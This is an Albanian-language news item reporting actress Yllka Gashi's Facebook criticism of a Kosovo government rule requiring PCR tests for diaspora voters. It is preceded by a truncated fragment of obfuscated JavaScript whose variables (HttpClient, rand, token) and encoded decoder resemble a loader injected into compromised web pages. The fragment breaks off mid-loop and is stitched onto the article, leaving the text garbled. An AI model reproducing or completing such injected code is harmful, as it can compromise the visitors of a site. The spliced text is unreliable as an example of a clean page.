;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Yllka Gashi e revoltuar pas vendimit të qeverisë për testet PCR të mërgimtarëve

By

Në mbledhjen të enjten, qeveria në detyrë ka miratuar vendimin për masat e reja anti-COVID. Sipas këtij vendimi është hequr ora policore edhe për komunat që janë në zonë të kuqe, ndërsa mërgimtarëve që vijnë nga shtetet me rrezik të lartë të COVID-19, iu kërkohet testi PCR, pak ditë para se ata të udhëtonin për Kosovë, për votim në zgjedhje.

Ky vendim ka ngjallur reagime të shumta në publik, mes tyre aktorja Yllka Gashi përmes një postimi në Facebook, e quajti të turpshëm këtë vendim.

“Mërgimtarëve po ju lypni teste PCR, e kta tjerët që po i mledhni masovikisht nëpër tubime a po i testoni?! As maskat nuk po i mani ju vet, shumica e politikanve që po lypni vota prej popullit, po prini me shembull t’keq, midis pandemisë. Joe Biden i fitoi zgjedhjet në Amerikë ku jon ma shumë se 300 milionë banorë, nëpër parkingje me distancë fizike e me maska krejt. A ju që s’keni as jod e fasha sterile nëpër spitale i rrezikoni njerëzit nëpër tubime e po ua rononi gjendjen edhe ma shumë punëtorëve mjekësor veq për interesat e juja personale e apetitin politik. Se për Kosovë që nuk ja u nin’ fort moti e kemi kuptu. Me kto standarde të dyfishta e me këtë paftyrësi jeni ba të gërditshëm. Marre!”, ka shkruar ajo. /Prive.al

Artikuj të ngjashëm